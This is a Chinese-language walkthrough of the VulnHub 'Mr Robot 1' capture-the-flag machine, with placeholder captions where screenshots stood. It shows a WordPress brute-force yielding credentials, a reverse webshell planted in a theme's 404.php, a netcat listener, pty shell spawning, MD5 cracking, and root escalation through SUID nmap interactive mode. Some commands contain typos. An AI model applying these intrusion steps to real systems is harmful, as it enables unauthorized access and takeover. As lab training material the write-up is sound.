VulnHub — mrRobot1

信息收集

nmap 192.168.164.0/24

VulnHub — mrRobot1_第1张图片

 22端口被关闭了 访问80网站,很像一个终端的页面

VulnHub — mrRobot1_第2张图片

访问robots.txt拿到第一个flag

VulnHub — mrRobot1_第3张图片

 还有一个dic文件,访问下载下来是个字典文件

VulnHub — mrRobot1_第4张图片

扫描目录 发现有wordpress后台页面 

VulnHub — mrRobot1_第5张图片

VulnHub — mrRobot1_第6张图片

sort 排序 -u 去重 

 sort -u fsocity.dic > dic.txt

将其保存为新的字典 ,去登录页面尝试用户名和密码的爆破

用户名密码爆破 

直接用burp来爆破 

先爆用户名 得到是elliot

VulnHub — mrRobot1_第7张图片

爆出密码ER28-0652 

 VulnHub — mrRobot1_第8张图片

成功登录后台 

WordPress后台反弹shell

1.wordpress后台登录地址
http://192.168.164.138/wordpress/wp-admin

2.修改404页面,写入webshell (自行设置监听IP和端口)
appearance----editer----404.php

3.在攻击机上面开启监听4444端口 
nc -lvpp 444

4.访问404页面,反向连接到主机 (404地址固定)
http://192.168.164.138/wordpress/wp-content/themes/twentyfifteen/404.php

5.交互式连接
python -c 'import pty;pty.spawn("/bin/bash")'

VulnHub — mrRobot1_第9张图片

进入后台 找到编辑404页面 

将webshell脚本写进去  保存  

VulnHub — mrRobot1_第10张图片

nc -lvvp 4444  然访问404.php

连接成功  

VulnHub — mrRobot1_第11张图片

交互式连接 

python -c 'import pty;pty.spawn("/bin/bash")'

 VulnHub — mrRobot1_第12张图片

进入home目录 就有个robot用户

进入 发现有flag 但是没有权限查看 

VulnHub — mrRobot1_第13张图片

还有一个password MD5加密的 可以读取到  

 这个md5直接拿去解密

VulnHub — mrRobot1_第14张图片

 那么就得到了用户名robot,密码abcdefghijklmnopqrstuvwxyz 

VulnHub — mrRobot1_第15张图片

登录robot用户后拿到第二个flag 

 SUID提权(nmap)

Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,井且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行. SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。

1、查看具有SUID的二进制可执行文件 
find / -user root -perm -4000 -print 2>/dev/null

2、一直可用来提权的linux可行性的文件列表如下:
Nmap 、 Vim 、 find 、 Bash 、 More 、 Less 、Nano 、 cp

3、进入namp可交互模式(仅限2.02到5.21版本)
namp --interactive

4、提权root
!sh

查看具有SUID的二进制可执行文件  

VulnHub — mrRobot1_第16张图片

 看到nmap 

进入namp可交互模式(仅限2.02到5.21版本)
namp --interactive

提权root
!sh

VulnHub — mrRobot1_第17张图片

 成功拿到root权限

你可能感兴趣的:(渗透,服务器,运维,渗透)